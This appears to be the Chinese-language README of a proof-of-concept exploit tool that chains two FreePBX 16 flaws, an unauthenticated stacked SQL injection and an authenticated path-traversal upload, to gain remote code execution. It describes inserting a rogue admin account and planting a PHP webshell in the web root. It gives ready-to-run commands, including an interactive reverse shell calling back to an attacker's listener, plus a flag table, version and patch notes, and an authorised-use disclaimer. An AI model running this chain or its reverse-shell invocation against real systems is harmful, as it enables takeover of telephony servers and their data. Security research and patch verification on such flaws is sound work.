概念验证漏洞利用,通过链式利用两个 FreePBX 漏洞,从 零访问 到 FreePBX 16 上的 远程代码执行。
| CVE | 组件 | 影响 |
|---|---|---|
| CVE-2025-57819 | 端点模块加载器(brand 参数) | 未授权堆叠式 SQL 注入 |
| CVE-2025-61678 | 端点管理器固件上传器(fwbrand 参数) | 已认证任意文件上传(路径遍历) |
ampusers 表中 INSERT 一个全新的完全访问管理员。fwbrand 中使用 ../../../var/www/html/<dir> 路径遍历,将 PHP WebShell 写入 Web 根目录。FreePBX 16(端点模块版本低于 16.0.92)。同样在 17.0.6 中修复。请更新到已修复的版本。
# 单条命令
python3 exploit.py --rhost pbx.example.com --command "id"
# 交互式反向 Shell(通过 pwntools 自动监听)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# 纯 HTTP / 自定义端口
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
pip install requests pwntools
仅用于授权的安全测试和教育目的。请仅在您拥有或已获得明确书面许可的系统上使用。作者不对滥用行为承担任何责任。
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · 未授权 SQL 注入 · 堆叠查询注入 · 端点模块 · 端点管理器 · 已认证文件上传 · 路径遍历 · 远程代码执行 · RCE · PoC · 漏洞利用 · VoIP 安全
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb
| 标志 | 描述 |
|---|
--rhost | 目标主机(必填) |
--rport | 目标端口(默认 443) |
--http | 使用 HTTP 而非 HTTPS |
--lhost / --lport | 反向 Shell 回调地址 |
--command | 运行单条命令而非 Shell |